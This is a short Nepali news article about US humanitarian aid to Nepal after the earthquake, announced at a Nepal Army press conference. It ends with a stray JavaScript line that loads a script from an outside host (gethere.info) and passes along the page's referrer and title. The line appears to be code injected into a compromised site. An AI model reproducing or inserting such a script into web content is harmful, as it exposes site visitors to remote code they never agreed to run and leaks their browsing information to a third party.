नेपालमा आएको भूकम्प पश्चात अमेरिकाले ४ करोड ७० लाख अमेरिकी डलर वरावरको मानबिय सहायता उपलव्ध गराएको नजाएको छ। नेपाली सेना मुख्यालयमा आयोजित पत्रकार सम्मेलनमा नेपालीका लागी अमेरिकी राजदूत पिटर डव्लु बोडेले यु यस आई डि तथा अमेरिकी रक्षा मन्त्रालयको सहयोग समेत गरि ४ करोड ७० लाख अमेरिकी डलर वरावरको मानबिय सहायता उपलव्ध गराएको जानकारी दिनुभयो।

बिषेश गरि काठमाडौ उपत्यका बाहिरका बिकट क्षेत्रका साथै काठमाडो.का भूकम्प पिडितहरुलाई बसोबास सामाग्री , औषधी , पिउने पानी बितरण गरि सहयोगलार्इं निरन्तता दिने उहाले बताउनुभयो । यसका अतिरिक्त्त अमेरिकाले १७ लाख अमेरिकी डलर बराबरको सामाग्री प्रदान गर्ने जनाएको छ।

पत्रकार सम्मेलनमा नेपाली सेनाका प्रधानसेनापनि गौरव शम्सेर राणाले नेपालमा सबै देशको सहयोग रहेको भन्दै अमेरिकी सेनाले गरेको सहयोगको प्रसंसा गर्नुभयो। अमेरिकी सेनाले नेपालमा भग्नावशेष भएका सम्पदाको क्षतीको बारेमा पनि सर्बेक्षण गरेको जनाएको छ।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;